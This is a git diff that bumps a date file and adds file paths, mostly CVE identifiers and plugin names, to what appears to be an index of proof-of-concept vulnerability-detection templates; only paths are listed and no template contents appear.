diff --git a/date.txt b/date.txt index 781eeaca5b..fcb1ceaa6b 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241218 +20241219 diff --git a/poc.txt b/poc.txt index 12d6bb54f1..7633f93c2b 100644 --- a/poc.txt +++ b/poc.txt @@ -1902,6 +1902,7 @@ ./poc/auth/about-author.yaml ./poc/auth/ac-weak-login.yaml ./poc/auth/accept-authorize-net-payments-using-contact-form-7-236bcbdbfe25f4f674ac30a10158deed.yaml +./poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml ./poc/auth/access-category-password-721c6586da2abd6f25490c1a78f566dd.yaml ./poc/auth/access-category-password.yaml ./poc/auth/accredible-certificates-19877bfd228a784355caff7bdef8ce37.yaml @@ -6443,6 +6444,7 @@ ./poc/aws/amazon-docker-config-280.yaml ./poc/aws/amazon-docker-config-disclosure-278.yaml ./poc/aws/amazon-docker-config-disclosure.yaml +./poc/aws/amazon-docker-config-exposure.yaml ./poc/aws/amazon-docker-config.yaml ./poc/aws/amazon-ec2-detect.yaml ./poc/aws/amazon-ec2-ssrf.yaml @@ -7764,6 +7766,7 @@ ./poc/config/amazon-docker-config-280.yaml ./poc/config/amazon-docker-config-disclosure-278.yaml ./poc/config/amazon-docker-config-disclosure.yaml +./poc/config/amazon-docker-config-exposure.yaml ./poc/config/amazon-docker-config.yaml ./poc/config/ansible-config-disclosure-325.yaml ./poc/config/ansible-config-disclosure-326.yaml @@ -9309,6 +9312,7 @@ ./poc/cve/CVE-2012-0898-e25a6dec390cf15b0d1249b5ad5c9d6b.yaml ./poc/cve/CVE-2012-0898.yaml ./poc/cve/CVE-2012-0901-2138.yaml +./poc/cve/CVE-2012-0901-2139.yaml ./poc/cve/CVE-2012-0901-2141.yaml ./poc/cve/CVE-2012-0901-a5e592be45bff7543088d5e909ebfd19.yaml ./poc/cve/CVE-2012-0901.yaml @@ -10304,6 +10308,7 @@ ./poc/cve/CVE-2014-4543.yaml ./poc/cve/CVE-2014-4544-2359.yaml ./poc/cve/CVE-2014-4544-2360.yaml +./poc/cve/CVE-2014-4544-2362.yaml ./poc/cve/CVE-2014-4544-74b7953759bf1b1f23ebc5ba5596be18.yaml ./poc/cve/CVE-2014-4544.yaml ./poc/cve/CVE-2014-4545-fa7995388055bd6919e3852d9af8af84.yaml @@ -18844,6 +18849,7 @@ ./poc/cve/CVE-2021-24748.yaml ./poc/cve/CVE-2021-24749-f00fd172da2b9412763c17a6073a0824.yaml ./poc/cve/CVE-2021-24749.yaml +./poc/cve/CVE-2021-24750-5763.yaml ./poc/cve/CVE-2021-24750-5764.yaml ./poc/cve/CVE-2021-24750-8a31f4a64820c00c32222ce8ced456f1.yaml ./poc/cve/CVE-2021-24750.yaml @@ -19597,6 +19603,7 @@ ./poc/cve/CVE-2021-25109.yaml ./poc/cve/CVE-2021-25110-a5ef4cd3e6eaf436924d83f61b36f76a.yaml ./poc/cve/CVE-2021-25110.yaml +./poc/cve/CVE-2021-25111-5801.yaml ./poc/cve/CVE-2021-25111-5802.yaml ./poc/cve/CVE-2021-25111-5803.yaml ./poc/cve/CVE-2021-25111-e640acbee9a077ca1d863383eb2c8ddd.yaml @@ -20336,6 +20343,7 @@ ./poc/cve/CVE-2021-38312.yaml ./poc/cve/CVE-2021-38314-1.yaml ./poc/cve/CVE-2021-38314-2.yaml +./poc/cve/CVE-2021-38314-6300.yaml ./poc/cve/CVE-2021-38314-7f0b8207cd058c35954334945ab28be6.yaml ./poc/cve/CVE-2021-38314.yaml ./poc/cve/CVE-2021-38315-1012d4d114a54633af04ce1c040152c6.yaml @@ -20506,6 +20514,7 @@ ./poc/cve/CVE-2021-39322-262084dbc8e5d4ed4776882955e89dac.yaml ./poc/cve/CVE-2021-39322-6337.yaml ./poc/cve/CVE-2021-39322-6338.yaml +./poc/cve/CVE-2021-39322-6339.yaml ./poc/cve/CVE-2021-39322.yaml ./poc/cve/CVE-2021-39325-30b86d7c5be08dc63d78d6a517f9a0b6.yaml ./poc/cve/CVE-2021-39325.yaml @@ -37089,6 +37098,7 @@ ./poc/cve/CVE-2024-10544.yaml ./poc/cve/CVE-2024-10547-91ad0f702b882575a68f7cd6df342c13.yaml ./poc/cve/CVE-2024-10547.yaml +./poc/cve/CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c.yaml ./poc/cve/CVE-2024-1055-d648797daf2d40f2e3020df2557ea8d6.yaml ./poc/cve/CVE-2024-1055.yaml ./poc/cve/CVE-2024-10551-740e0e624799af0f29235cfe4c93224c.yaml @@ -37626,6 +37636,7 @@ ./poc/cve/CVE-2024-11252-6eb54caff749470d94f371cf65690bbc.yaml ./poc/cve/CVE-2024-11252.yaml ./poc/cve/CVE-2024-11254-0a41e95f2c7eae4094eccfb9191bc605.yaml +./poc/cve/CVE-2024-11254.yaml ./poc/cve/CVE-2024-1126-1b1f550770c7ded4c68a1b5c108b2d09.yaml ./poc/cve/CVE-2024-1126-6bafa5b3da4f53df7d3b25cb59f59ac9.yaml ./poc/cve/CVE-2024-1126.yaml @@ -37652,6 +37663,7 @@ ./poc/cve/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml ./poc/cve/CVE-2024-1129.yaml ./poc/cve/CVE-2024-11291-4b3df78ea45d69129dc5fbd828bf0deb.yaml +./poc/cve/CVE-2024-11291.yaml ./poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml ./poc/cve/CVE-2024-11292.yaml ./poc/cve/CVE-2024-11293-445cfc68523ff32c33fa3e493bbbe08c.yaml @@ -37659,6 +37671,7 @@ ./poc/cve/CVE-2024-11294-02c448312fb9404f749dae6769ea4c77.yaml ./poc/cve/CVE-2024-11294.yaml ./poc/cve/CVE-2024-11295-a4e709d48a2b52b5c9f616e57c38968a.yaml +./poc/cve/CVE-2024-11295.yaml ./poc/cve/CVE-2024-1130-098b26182013dbcd4e8583ec0a56cb16.yaml ./poc/cve/CVE-2024-1130.yaml ./poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml @@ -37702,6 +37715,7 @@ ./poc/cve/CVE-2024-11354.yaml ./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml ./poc/cve/CVE-2024-11355.yaml +./poc/cve/CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd.yaml ./poc/cve/CVE-2024-11359-567f69cc9128256f747073b779df1fef.yaml ./poc/cve/CVE-2024-11359.yaml ./poc/cve/CVE-2024-1136-f9f5bee6a9071adf3f3736b66c18ce7f.yaml @@ -37806,6 +37820,7 @@ ./poc/cve/CVE-2024-11438-466e48b3dc4ddb929568c36634c56fb1.yaml ./poc/cve/CVE-2024-11438.yaml ./poc/cve/CVE-2024-11439-475f578349d17c65330df618e26d04b2.yaml +./poc/cve/CVE-2024-11439.yaml ./poc/cve/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml ./poc/cve/CVE-2024-11440.yaml ./poc/cve/CVE-2024-11442-30a6c47687fa6512015ca0f6c418b128.yaml @@ -37938,9 +37953,11 @@ ./poc/cve/CVE-2024-11730.yaml ./poc/cve/CVE-2024-11732-6300c1dae27be21acd061d5288a24196.yaml ./poc/cve/CVE-2024-11732.yaml +./poc/cve/CVE-2024-11740-0129d5469319a449ba4a4cece10b2475.yaml ./poc/cve/CVE-2024-11747-62f3cf7911a4e9abbe89a873183d1c75.yaml ./poc/cve/CVE-2024-11747.yaml ./poc/cve/CVE-2024-11748-15ab22025f25319cc075ac10ba230d57.yaml +./poc/cve/CVE-2024-11748.yaml ./poc/cve/CVE-2024-1175-59b1d28bf860d8876b76c01c1e383ade.yaml ./poc/cve/CVE-2024-1175-72fe71d31a0485cb4068281d44a8c3e9.yaml ./poc/cve/CVE-2024-1175-d6c5d59d8ac18ee4256473011fc09f08.yaml @@ -37973,6 +37990,7 @@ ./poc/cve/CVE-2024-11766.yaml ./poc/cve/CVE-2024-11767-91a6d26ebb5178e02ef1e638799045fa.yaml ./poc/cve/CVE-2024-11767.yaml +./poc/cve/CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml ./poc/cve/CVE-2024-11769-b830f60593d6bc500bc45458ecb55b68.yaml ./poc/cve/CVE-2024-11769.yaml ./poc/cve/CVE-2024-1177-44b068407f4a1063af5594e6bad17afb.yaml @@ -38055,6 +38073,7 @@ ./poc/cve/CVE-2024-11880-c4c58d47a5ee0ae307eff48c75fa9422.yaml ./poc/cve/CVE-2024-11880.yaml ./poc/cve/CVE-2024-11881-28951564b40a53810677e572dcba4e96.yaml +./poc/cve/CVE-2024-11881.yaml ./poc/cve/CVE-2024-11882-ea7a3f25a6986885eafd4392096ffc0e.yaml ./poc/cve/CVE-2024-11882.yaml ./poc/cve/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml @@ -38094,6 +38113,7 @@ ./poc/cve/CVE-2024-11911-faf718aed0ef166f0179212ee8a9f3c3.yaml ./poc/cve/CVE-2024-11911.yaml ./poc/cve/CVE-2024-11912-6ccaac05572b45a2acb0cf1f38c333a9.yaml +./poc/cve/CVE-2024-11912.yaml ./poc/cve/CVE-2024-11914-c373722513f4866f4994cae968afdfbb.yaml ./poc/cve/CVE-2024-11914.yaml ./poc/cve/CVE-2024-11918-095887b4ec8bd9bbd522023a03b46270.yaml @@ -38101,6 +38121,7 @@ ./poc/cve/CVE-2024-11925-7672d2ec8fe92df70998a26a9cf9b901.yaml ./poc/cve/CVE-2024-11925.yaml ./poc/cve/CVE-2024-11926-3eda00250e08ecc30fa30e5fb71ad416.yaml +./poc/cve/CVE-2024-11926.yaml ./poc/cve/CVE-2024-11928-a16bd2247c01bb8d43e62b3bb1620982.yaml ./poc/cve/CVE-2024-11928.yaml ./poc/cve/CVE-2024-11935-088fa6aefbb99715a7cda0aadf2f36df.yaml @@ -38126,6 +38147,7 @@ ./poc/cve/CVE-2024-12024-2503621efdf2f1cb7e290aff6361b0e6.yaml ./poc/cve/CVE-2024-12024.yaml ./poc/cve/CVE-2024-12025-4c9c64b61165ebb81c12eb54c60dfa5f.yaml +./poc/cve/CVE-2024-12025.yaml ./poc/cve/CVE-2024-12026-048d32aed4281761d7c921ef3e5b09bc.yaml ./poc/cve/CVE-2024-12026-c3675bda547bc33d41571993b615aadf.yaml ./poc/cve/CVE-2024-12026.yaml @@ -38152,6 +38174,7 @@ ./poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml ./poc/cve/CVE-2024-12060.yaml ./poc/cve/CVE-2024-12061-b41bc216e05397f68e1c316d11d953c1.yaml +./poc/cve/CVE-2024-12061.yaml ./poc/cve/CVE-2024-12062-e6f7834c3eb1eb9aabc9534922a2b0a2.yaml ./poc/cve/CVE-2024-12062.yaml ./poc/cve/CVE-2024-1207-9fc726e35e00675f40b1bb34bea36c9b.yaml @@ -38171,6 +38194,7 @@ ./poc/cve/CVE-2024-12115-3d071505c2ef1942d31e62067bb7b342.yaml ./poc/cve/CVE-2024-12115.yaml ./poc/cve/CVE-2024-1212.yaml +./poc/cve/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml ./poc/cve/CVE-2024-12127-90ac73f882c80998d9b42d276bfcc870.yaml ./poc/cve/CVE-2024-12127.yaml ./poc/cve/CVE-2024-12128-5b31f632a2dbc3187253dd9153d43eba.yaml @@ -38212,6 +38236,7 @@ ./poc/cve/CVE-2024-12239-a261d97e057d0344b0d272aa7d74cced.yaml ./poc/cve/CVE-2024-12239.yaml ./poc/cve/CVE-2024-12250-1ea7392f59e0ddf4978022124851bf49.yaml +./poc/cve/CVE-2024-12250.yaml ./poc/cve/CVE-2024-12253-c678eb115eb7d6bb53d9036495534285.yaml ./poc/cve/CVE-2024-12253.yaml ./poc/cve/CVE-2024-12255-bfc5cc29e7dea10995b88239c4b0d0b0.yaml @@ -38221,6 +38246,7 @@ ./poc/cve/CVE-2024-12258-2b0b2ebca93c2b3412aa41ef60f3638c.yaml ./poc/cve/CVE-2024-12258.yaml ./poc/cve/CVE-2024-12259-344ffbf5ed79000bc36568816138482f.yaml +./poc/cve/CVE-2024-12259.yaml ./poc/cve/CVE-2024-12260-e830e5f6450ff91a722bdd1a788fe6ed.yaml ./poc/cve/CVE-2024-12260.yaml ./poc/cve/CVE-2024-12263-fa7054e9893ee8c27ef6719a5ea1e128.yaml @@ -38234,6 +38260,7 @@ ./poc/cve/CVE-2024-12283-1957debb32749c4b64112c4a33d76ad7.yaml ./poc/cve/CVE-2024-12283.yaml ./poc/cve/CVE-2024-12287-8c4acd957f17d47a30609f0209cc76f3.yaml +./poc/cve/CVE-2024-12287.yaml ./poc/cve/CVE-2024-1229-c6d7bb9ffd8a626f74b1cf581ee631f7.yaml ./poc/cve/CVE-2024-1229.yaml ./poc/cve/CVE-2024-12293-4dd79f26a6e5d053a5956f8620a3344b.yaml @@ -38258,6 +38285,7 @@ ./poc/cve/CVE-2024-12325.yaml ./poc/cve/CVE-2024-12329-f9f82ade00c6a59a04b6f84706304098.yaml ./poc/cve/CVE-2024-12329.yaml +./poc/cve/CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7.yaml ./poc/cve/CVE-2024-12333-7b6d410c0b3b65296f542385dba469b2.yaml ./poc/cve/CVE-2024-12333.yaml ./poc/cve/CVE-2024-12338-5605bf55e24ce1b2233083e5c7c380b3.yaml @@ -38265,6 +38293,7 @@ ./poc/cve/CVE-2024-1234-f40f3ae232b12cf9233c22ef4e6ba985.yaml ./poc/cve/CVE-2024-1234.yaml ./poc/cve/CVE-2024-12340-e574ab0a95b2364359c38e28de3f4115.yaml +./poc/cve/CVE-2024-12340.yaml ./poc/cve/CVE-2024-12341-ca294d1fd38eff7070acb6bb69bab6b0.yaml ./poc/cve/CVE-2024-12341.yaml ./poc/cve/CVE-2024-1235-21d1ea5a670d46cfb24ae9fe13a6deb9.yaml @@ -38297,6 +38326,7 @@ ./poc/cve/CVE-2024-12422-aeceb3fb45bf879d6b9a1d0dc516f06c.yaml ./poc/cve/CVE-2024-12422.yaml ./poc/cve/CVE-2024-12432-5b5915220e6a42abeb51e9b392575c63.yaml +./poc/cve/CVE-2024-12432.yaml ./poc/cve/CVE-2024-12441-1756d8f05db11c9f2310e3f212f24527.yaml ./poc/cve/CVE-2024-12441-74e5d36f1605e404ac6d859d22377c3d.yaml ./poc/cve/CVE-2024-12441.yaml @@ -38309,7 +38339,9 @@ ./poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml ./poc/cve/CVE-2024-12448.yaml ./poc/cve/CVE-2024-12449-8a82767d9800d12163c96ba6ad7adf65.yaml +./poc/cve/CVE-2024-12449.yaml ./poc/cve/CVE-2024-12454-5621596be5bd586ce99dcc404a2f85f8.yaml +./poc/cve/CVE-2024-12454.yaml ./poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml ./poc/cve/CVE-2024-12458.yaml ./poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml @@ -38325,11 +38357,13 @@ ./poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml ./poc/cve/CVE-2024-12474.yaml ./poc/cve/CVE-2024-12500-fda26400f9dece6114dcd6955fceb5ac.yaml +./poc/cve/CVE-2024-12500.yaml ./poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml ./poc/cve/CVE-2024-12501.yaml ./poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml ./poc/cve/CVE-2024-12502.yaml ./poc/cve/CVE-2024-12513-826c2ee2f56d5d07458720b488403657.yaml +./poc/cve/CVE-2024-12513.yaml ./poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml ./poc/cve/CVE-2024-12517.yaml ./poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml @@ -38337,8 +38371,10 @@ ./poc/cve/CVE-2024-12526-d0175a79efc04628234f5b16874bd415.yaml ./poc/cve/CVE-2024-12526.yaml ./poc/cve/CVE-2024-12554-f7e364a88d43fcf0d377a1e86841f6a0.yaml +./poc/cve/CVE-2024-12554.yaml ./poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml ./poc/cve/CVE-2024-12555.yaml +./poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml ./poc/cve/CVE-2024-12572-99c5fc1f98bec101dce40530a6fa4801.yaml ./poc/cve/CVE-2024-12572.yaml ./poc/cve/CVE-2024-12574-411e698a90aecedc46e74ff8fd9e6336.yaml @@ -38350,8 +38386,10 @@ ./poc/cve/CVE-2024-12581-76cef049807f0d0c701a5c76e40729ed.yaml ./poc/cve/CVE-2024-12581.yaml ./poc/cve/CVE-2024-12596-774434bb9ea28259fa8266e81972c00f.yaml +./poc/cve/CVE-2024-12596.yaml ./poc/cve/CVE-2024-12601-b82cf7ad4580a990c2c5594b0652b203.yaml ./poc/cve/CVE-2024-12601.yaml +./poc/cve/CVE-2024-12626-300286d442729c59242e3ed40a31f2a5.yaml ./poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml ./poc/cve/CVE-2024-12628.yaml ./poc/cve/CVE-2024-1273-7a7d027c3b90e9a4f71fda8d00cf65ff.yaml @@ -45384,6 +45422,7 @@ ./poc/cve/CVE-2024-43232.yaml ./poc/cve/CVE-2024-43233-85f3cce0d6d07d97f0d7df696bff451c.yaml ./poc/cve/CVE-2024-43233.yaml +./poc/cve/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml ./poc/cve/CVE-2024-43235-2154ff0380e6daad445c31c3587ca5c2.yaml ./poc/cve/CVE-2024-43235.yaml ./poc/cve/CVE-2024-43236-0aa244f387067d6fa1a2f360a122d1ca.yaml @@ -48109,6 +48148,7 @@ ./poc/cve/CVE-2024-51814-c9d1de6f4895b6765e1577177716171e.yaml ./poc/cve/CVE-2024-51814.yaml ./poc/cve/CVE-2024-51815-2050eb9a873e413f9671599898c2d828.yaml +./poc/cve/CVE-2024-51815-c1a5d2a9a6da5fe3f3b34cd3252bd9c2.yaml ./poc/cve/CVE-2024-51815.yaml ./poc/cve/CVE-2024-51816-bdee10c167d3a9876a83e9819552c55d.yaml ./poc/cve/CVE-2024-51816.yaml @@ -49098,6 +49138,13 @@ ./poc/cve/CVE-2024-54232.yaml ./poc/cve/CVE-2024-5424-df160c9df5b615381a764753829b3ffb.yaml ./poc/cve/CVE-2024-5424.yaml +./poc/cve/CVE-2024-54240-a2f6789a7a236589446d14d1c3f866b6.yaml +./poc/cve/CVE-2024-54240-ed4ff64a46e17d58cd08c47d78193084.yaml +./poc/cve/CVE-2024-54242-3b5086237f4638cb162a9f792453261e.yaml +./poc/cve/CVE-2024-54242-96632825cfd9f5b03b99528997824213.yaml +./poc/cve/CVE-2024-54243-87a7d63f5b8e33b647cfcc9ecc055c10.yaml +./poc/cve/CVE-2024-54244-908fba9dd40f4471beff68bece44dab3.yaml +./poc/cve/CVE-2024-54245-25b820cd545669d7785ad46d5c7b657d.yaml ./poc/cve/CVE-2024-54247-32dd452fd1db8cb528bb367644d98408.yaml ./poc/cve/CVE-2024-54247.yaml ./poc/cve/CVE-2024-5425-8573326a950aad533931811dfbdfb643.yaml @@ -49114,6 +49161,10 @@ ./poc/cve/CVE-2024-5426.yaml ./poc/cve/CVE-2024-54260-174ca9070168a4655d9261554d70d98e.yaml ./poc/cve/CVE-2024-54260.yaml +./poc/cve/CVE-2024-54261-5582920a3f8c43604a8f19f2f919fe5e.yaml +./poc/cve/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml +./poc/cve/CVE-2024-54267-ccf671ed5cd0d4e6c19828ed0428edad.yaml +./poc/cve/CVE-2024-54268-1ee53f44eb931385f5bebe5e1a66b55d.yaml ./poc/cve/CVE-2024-5427-8e98140a73fa39518f80acb935a5af8c.yaml ./poc/cve/CVE-2024-5427.yaml ./poc/cve/CVE-2024-5429-4e4d745e7910fb2ab893ff12ad5452c1.yaml @@ -57767,6 +57818,7 @@ ./poc/cve/cve-2021-26084-8-5833.yaml ./poc/cve/cve-2021-26084-9(1).yaml ./poc/cve/cve-2021-26084-9-5834.yaml +./poc/cve/cve-2021-26084.yaml ./poc/cve/cve-2021-26085(1).yaml ./poc/cve/cve-2021-26085-5840.yaml ./poc/cve/cve-2021-26085-5841.yaml @@ -62701,6 +62753,7 @@ ./poc/docker/amazon-docker-config-280.yaml ./poc/docker/amazon-docker-config-disclosure-278.yaml ./poc/docker/amazon-docker-config-disclosure.yaml +./poc/docker/amazon-docker-config-exposure.yaml ./poc/docker/amazon-docker-config.yaml ./poc/docker/aws-ecs-container-agent-tasks-639.yaml ./poc/docker/aws-ecs-container-agent-tasks-640.yaml @@ -63339,6 +63392,7 @@ ./poc/exposed/allied-telesis-exposure.yaml ./poc/exposed/amazon-docker-config-disclosure-278.yaml ./poc/exposed/amazon-docker-config-disclosure.yaml +./poc/exposed/amazon-docker-config-exposure.yaml ./poc/exposed/amazon-sns-topic-disclosure-detect.yaml ./poc/exposed/ambari-exposure-291.yaml ./poc/exposed/ambari-exposure-292.yaml @@ -85330,6 +85384,7 @@ ./poc/other/age-verify.yaml ./poc/other/agency-toolkit-2b3a89533fdd22bc487facacae78c32e.yaml ./poc/other/agency-toolkit-c4d0da08ce2ccde8e115ab3f856365e3.yaml +./poc/other/agency-toolkit.yaml ./poc/other/agendapress-9d379c9201895f0b4f055dca919e584a.yaml ./poc/other/agendapress.yaml ./poc/other/agenteasy-properties-a5fa9b1dc7a85d57314efe1983687fb0.yaml @@ -85993,6 +86048,7 @@ ./poc/other/animated-typing-effect.yaml ./poc/other/animati-pacs.yaml ./poc/other/animation-addons-for-elementor-8cb2b19594b70ed1d20a65da8b6d2986.yaml +./poc/other/animation-addons-for-elementor.yaml ./poc/other/animeplanet.yaml ./poc/other/anmai-system.yaml ./poc/other/anneca-intouch-crm.yaml @@ -87685,6 +87741,7 @@ ./poc/other/bg-patriarchia-bu.yaml ./poc/other/bh-bh5000c.yaml ./poc/other/biagiotti-membership-890b34de1d7826afddfee44c27d08a72.yaml +./poc/other/biagiotti-membership.yaml ./poc/other/bib2html-d49e316b2a9fd89cfdca05b034c4f43c.yaml ./poc/other/bib2html.yaml ./poc/other/bible-text-2fb996e0b3ee50923d0955b53bdc3c30.yaml @@ -88592,6 +88649,7 @@ ./poc/other/broken-link-checker-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/broken-link-checker-plugin.yaml ./poc/other/broken-link-checker.yaml +./poc/other/broken-link-finder-4ff2e9009576af041b5a7e782318ee33.yaml ./poc/other/broken-link-finder-e63d15357b99e350a186c3e25f59b7fd.yaml ./poc/other/broken-link-finder.yaml ./poc/other/broken-link-hijacking.yaml @@ -89005,6 +89063,7 @@ ./poc/other/busybox-repository-browser.yaml ./poc/other/button-74c30e2d8ce2c9b5cd693f86892b1b66.yaml ./poc/other/button-block-7ecfdf192cf94acce6cac43afe49f5ac.yaml +./poc/other/button-block-ebc0f1c83e52f295da4b8e511e072df7.yaml ./poc/other/button-block.yaml ./poc/other/button-cabfe9182f2c658e08c2c822ba1d8b8a.yaml ./poc/other/button-contact-vr-00cf0dc7057886aabfaae3f4a59771ca.yaml @@ -90280,6 +90339,7 @@ ./poc/other/clientaccesspolicy.yaml ./poc/other/clientexec.yaml ./poc/other/clientmesh-malware.yaml +./poc/other/clients-41225319ecc15ac24c062330ae8b961c.yaml ./poc/other/climatejusticerocks-mastodon-instance.yaml ./poc/other/cliniccases.yaml ./poc/other/clio-grow-form-0592c21f03e73280a2c0f582bc446892.yaml @@ -90399,6 +90459,7 @@ ./poc/other/cm-ad-changer-plugin.yaml ./poc/other/cm-ad-changer.yaml ./poc/other/cm-answers-07fb2e4180c141343441b07b45399c93.yaml +./poc/other/cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce.yaml ./poc/other/cm-answers.yaml ./poc/other/cm-business-directory.yaml ./poc/other/cm-download-manager-511c70bb5a6ca82828706647b1902190.yaml @@ -90630,6 +90691,7 @@ ./poc/other/collapsing-archives-8a4859018381231c43949c3ecb04831f.yaml ./poc/other/collapsing-archives.yaml ./poc/other/collapsing-categories-b92da15653f7212a9df1f5d57bdcbceb.yaml +./poc/other/collapsing-categories.yaml ./poc/other/collectchat-525851924ba115a8276729ede6c6c5bc.yaml ./poc/other/collectchat-a5b34f7c327071ca50c7be898ec7804e.yaml ./poc/other/collectchat.yaml @@ -93016,6 +93078,7 @@ ./poc/other/dlink-850l-info-leak-7037.yaml ./poc/other/dlink-850l-info-leak-7038.yaml ./poc/other/dlink-850l-info-leak-7039.yaml +./poc/other/dlink-850l-info-leak.yaml ./poc/other/dlink-850l-info-leak.yml ./poc/other/dlink-file-read.yaml ./poc/other/dlink-panel.yaml @@ -93203,6 +93266,7 @@ ./poc/other/download-info-page-ef92059d5750ea701f6be76b8740b016.yaml ./poc/other/download-info-page.yaml ./poc/other/download-manager-0330cd624538acece3fa4ac438571f36.yaml +./poc/other/download-manager-0b3c1d139da969d81ea373f38d201244.yaml ./poc/other/download-manager-0fb74b91277035155e3a675be1e98d3a.yaml ./poc/other/download-manager-1554986f43029970f8e1573ffde50003.yaml ./poc/other/download-manager-1aa8218553cef955f34140e5e9f9c804.yaml @@ -93237,6 +93301,7 @@ ./poc/other/download-manager-7a87f2367670d72c84f79f9fc687ee77.yaml ./poc/other/download-manager-7ba73846a9f6de9d7ba86ac8506158d5.yaml ./poc/other/download-manager-809a875188327a8370c96a7e6d41944e.yaml +./poc/other/download-manager-81cd1d79de28b7aae9b449e5f006a9f6.yaml ./poc/other/download-manager-8489a8e154ce624124d7df744992f179.yaml ./poc/other/download-manager-853fb05a45b2bfad623063abc5c98aa0.yaml ./poc/other/download-manager-871419f24909295af5c806dc07101270.yaml @@ -94021,6 +94086,7 @@ ./poc/other/easy-watermark-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/easy-watermark.yaml ./poc/other/easy-waveform-player-d8187a1daf11c2f64ad81046a48d9c78.yaml +./poc/other/easy-waveform-player.yaml ./poc/other/easy-wi-installer.yaml ./poc/other/easy-zillow-reviews-d719c21b3b083cea6a66583de9da5dde.yaml ./poc/other/easy-zillow-reviews.yaml @@ -94120,6 +94186,7 @@ ./poc/other/echo-knowledge-base.yaml ./poc/other/echosign-66a67f525cbd222bf1ed230c309bd4da.yaml ./poc/other/echosign.yaml +./poc/other/echoza-e1decf47b202b8b552a71edd87b20231.yaml ./poc/other/eclipse-birt-panel.yaml ./poc/other/ecoa-building-automation-lfd-7165.yaml ./poc/other/ecoa-building-automation-lfd-7166.yaml @@ -96223,6 +96290,7 @@ ./poc/other/files-download-delay-08fd51fbc78181d1e34dd9d45b2727c0.yaml ./poc/other/files-download-delay.yaml ./poc/other/filester-3e7eafb6dc9ec71ae8bff5c73b01f7a4.yaml +./poc/other/filester-568e78f1e3709813a32ee8f38f2cd07a.yaml ./poc/other/filester-6c98f1dd83857c308a85341bfd6845a6.yaml ./poc/other/filester-7ed5af5d850e2fce85818f9085ee2f60.yaml ./poc/other/filester-85309abff0088958079dfa7ce1d84b20.yaml @@ -97396,6 +97464,7 @@ ./poc/other/gafgyt-hoho-malware.yaml ./poc/other/gafgyt-jackmy-malware.yaml ./poc/other/gafgyt-oh-malware.yaml +./poc/other/gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80.yaml ./poc/other/galleria-2552889584e9a8b3449cfa72a8b31a3d.yaml ./poc/other/galleria.yaml ./poc/other/gallerio-606eb81fe551fe3b927eaba6df8254a6.yaml @@ -98323,6 +98392,7 @@ ./poc/other/grimag-10469289d4ce07c3ee9e6caf587a4ad6.yaml ./poc/other/grimag-17ffb26bf9cc3eba1406c5b966a9d3f3.yaml ./poc/other/grimag.yaml +./poc/other/grip-f2a32ddf27d02f7ada6388e3c4206c80.yaml ./poc/other/groovy-console-command-exec.yaml ./poc/other/groovy-console-open.yaml ./poc/other/grou-random-image-widget-1b2b3484e08cc8956371a1a2add454f7.yaml @@ -105599,6 +105669,7 @@ ./poc/other/one-page-blocks-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/other/one-page-blocks-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/one-page-blocks.yaml +./poc/other/one-paze-f2a32ddf27d02f7ada6388e3c4206c80.yaml ./poc/other/one-user-avatar-38cab75f654a2b2a6fc5d0bc2a75fde9.yaml ./poc/other/one-user-avatar-657d31ea5789105ee530267aea8bd01f.yaml ./poc/other/one-user-avatar.yaml @@ -106678,6 +106749,7 @@ ./poc/other/phastpress-6b35bbfd8685572f477ce7413f5fa351.yaml ./poc/other/phastpress.yaml ./poc/other/philantro-29c5a7b9291bcb9f2b3f30ab18228044.yaml +./poc/other/philantro.yaml ./poc/other/phlox-pro-2af4b34daae1da10d41ce9ef928d702c.yaml ./poc/other/phlox-pro.yaml ./poc/other/phocas.yaml @@ -110487,6 +110559,7 @@ ./poc/other/sb-random-posts-widget.yaml ./poc/other/scalable-vector-graphics-svg-7ebcc23c4b2581aa9b5947fe9c79480d.yaml ./poc/other/scalable-vector-graphics-svg.yaml +./poc/other/scancircle.yaml ./poc/other/scarlet-3f3b8c7ed0767e56cd182742c3ecd621.yaml ./poc/other/scarlet-c082eca31214ee073d6c1b304a5ef86c.yaml ./poc/other/scarlet-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -111736,6 +111809,8 @@ ./poc/other/simple-nav-archives.yaml ./poc/other/simple-news-255def006aa11dd7cff8831e3d71b7b6.yaml ./poc/other/simple-news.yaml +./poc/other/simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc.yaml 